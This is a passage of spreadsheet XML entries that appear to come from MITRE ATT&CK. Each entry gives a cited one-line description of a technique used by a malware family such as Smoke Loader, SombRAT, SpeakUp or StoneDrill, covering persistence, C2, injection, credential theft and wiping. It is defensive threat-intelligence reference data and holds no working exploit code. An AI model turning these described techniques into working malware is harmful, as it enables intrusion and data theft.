    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to add itself to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift` for persistence.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can obtain the IP address of a victim host.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can obtain the id of a logged in user.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can contact actor-controlled C2 servers by using the Telegram API over HTTPS.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use `cmd.exe` to execute commands on a victim's system.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for files named logins.json to parse for credentials.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for credentials stored from web browsers.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) deobfuscates its code.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) recursively searches through directories for files.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) downloads a new version of itself once it has installed. It also downloads additional plugins.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses a simple one-byte XOR method to obfuscate values in the malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) injects into the Internet Explorer process.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) launches a scheduled task.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) scans processes to perform anti-VM checks. (Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Visual Basic script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) creates a suspended svchost process and injects its DLL into it.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can write and execute PowerShell scripts.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can list all running processes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can start SOCKS proxy threads.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can take screenshots.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use a hardcoded RSA key to encrypt some of its C2 traffic.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to download additional payloads from C2 to the targeted system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use &lt;code&gt;RegOpenKeyW&lt;/code&gt; to access the Registry.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use "stackstrings" for obfuscation.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can search a list of running processes.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to query the Registry to detect a key specific to VMware.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use RC4 to encrypt C2 communications.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SodaMaster](https://attack.mitre.org/software/S0627) can check for the presence of the Registry key &lt;code&gt;HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe&lt;/code&gt; before proceeding to its main functionality.(Citation: Securelist APT10 March 2021)	 </t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can enumerate the host name and OS version on a target system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can identify the username on a compromised host.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to put itself to "sleep" for a specified time.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has encrypted collected data with AES-256 using a hardcoded key.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can SSL encrypt C2 traffic.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can communicate over DNS with the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has collected data and files from a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can run &lt;code&gt;upload&lt;/code&gt; to decrypt and upload files from storage.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use a custom DGA to generate a subdomain for C2.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;loadfromfile&lt;/code&gt;, &lt;code&gt;loadfromstorage&lt;/code&gt;, and &lt;code&gt;loadfrommem&lt;/code&gt; to inject a DLL  from disk, storage, or memory respectively.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has uploaded collected data and files from a compromised host to its C2 server.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [SombRAT](https://attack.mitre.org/software/S0615) has the ability to run &lt;code&gt;cancel&lt;/code&gt; or &lt;code&gt;closeanddeletestorage&lt;/code&gt; to remove all files from storage and delete the storage temp file on a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;enum&lt;/code&gt; to enumerate files in storage on a compromised system.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to download and execute additional payloads.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can store harvested data in a custom database under the %TEMP% directory.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use a legitimate process name to hide itself.(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to respawn itself using &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use TCP sockets to send data and ICMP to ping the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to modify its process memory to hide process command-line arguments.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use the &lt;code&gt;getprocesslist&lt;/code&gt; command to enumerate processes on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use an embedded SOCKS proxy in C2 communications.(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has encrypted its C2 communications with AES.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt; to enumerate the computer name and OS version of a compromised system.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt;  to identify the username on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can enumerate services on a victim machine.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt;  to discover the current time on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can decode and decrypt exfiltrated data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via &lt;code&gt;net.exe user /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing &lt;code&gt;net.exe group /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to list directories.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via &lt;code&gt;net.exe user&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to encode and RC6 encrypt data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate processes on a victim machine through use of [Tasklist](https://attack.mitre.org/software/S0057).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain persistence through use of scheduled tasks.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing [Systeminfo](https://attack.mitre.org/software/S0096).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via &lt;code&gt;ipconfig.exe /all&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a custom XOR algorithm to decrypt the payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has exfiltrated data over the C2 channel.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has been packed with Enigma Protector to obfuscate its contents.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has encoded communications with the C2 server with base64.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can collect the hostname, keyboard layout, and language from the system.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[Spark](https://attack.mitre.org/software/S0543) has checked the results of the &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and the language name returned by &lt;code&gt;GetLocaleInfoA&lt;/code&gt; to make sure they contain the word “Arabic” before executing.(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has run the whoami command and has a built-in command to identify the user logged in.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a splash screen to check whether an user actively clicks on the screen before running malicious code.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can use cmd.exe to run commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Perl scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses cron tasks to ensure persistence. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) deletes files to remove evidence on the machine. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) downloads and executes additional files from a remote server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) checks for availability of specific ports on servers.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes its second-stage payload with Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes C&amp;C communication using Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;cat /proc/cpuinfo | grep -c “cpu family” 2&gt;&amp;1&lt;/code&gt; command to gather system information. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;ifconfig -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;arp -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;whoami&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses POST and GET requests over HTTP to communicate with its main C&amp;C server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been signed with valid digital certificates.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has collected data and other information from a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can download malicious files from threat actor controlled AWS URL's.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has the ability to execute arbitrary JavaScript code on a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been executed through malicious links within spearphishing emails.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify payment systems, payment gateways, and ATM systems in compromised environments.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can check for the presence of 29 different antivirus tools.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can enumerate running software on a targeted system.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been distributed via emails containing a malicious link that appears to be a PDF document.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify the system name of a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify the IP of a compromised system.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encrypted collected data using a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has decrypted files and payloads using a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has exfiltrated victim data using HTTP POST requests to its C2 servers.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has downloaded and executed additional encoded payloads.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has relied on users enabling malicious macros within Microsoft Excel and Word attachments.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has relied on victims to click on a malicious link send via phishing campaigns.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been obfuscated with a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used PowerShell to execute its payload.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `regsvr32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `rundll32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been packed with a custom packer to hide payloads.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed via malicious Microsoft Office documents within spam emails.(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed through phishing emails containing a malicious URL.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encoded its communications to C2 servers using Base64.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has gathered victim computer information and configurations.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has collected the victim’s external IP address.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) can collect the user name from a compromised host.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used malicious VBA macros in Microsoft Word documents and Excel spreadsheets that execute an `AutoOpen` subroutine.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021) </t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used HTTP POST requests for C2 communications.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used `cmd.exe` for execution.(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) contains a feature to manipulate process privileges and tokens.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) identifies and kills anti-malware processes.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) has a hard-coded primary and backup C2 string.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>To establish persistence, [SslMM](https://attack.mitre.org/software/S0058) identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends the logged-on username to its hard-coded C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) decrypts and executes shellcode from a file called Stars.jps.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has a disk wiper module that targets files other than those in the Windows directory.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the accessible physical or logical drives of the infected machine.(Citation: Symantec Elfin Mar 2019)	</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the master boot record of an infected computer.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has been observed deleting the temporary files once they fulfill their task.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has obfuscated its module with an alphabet-based table or XOR encryption.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has relied on injecting its payload directly into the process memory of the victim's preferred browser.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has looked in the registry to find the default browser path.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can take screenshots.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can check for antivirus and antimalware programs.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has the capability to discover the system OS, Windows version, architecture and environment.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) can obtain the current date and time of the victim machine.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[StoneDrill](https://attack.mitre.org/software/S0380) has several VBS scripts used throughout the malware's lifecycle.(Citation: Kaspersky StoneDrill 2017)	</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used the WMI command-line (WMIC) utility to run tasks.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate drive types.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to modify the Registry.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
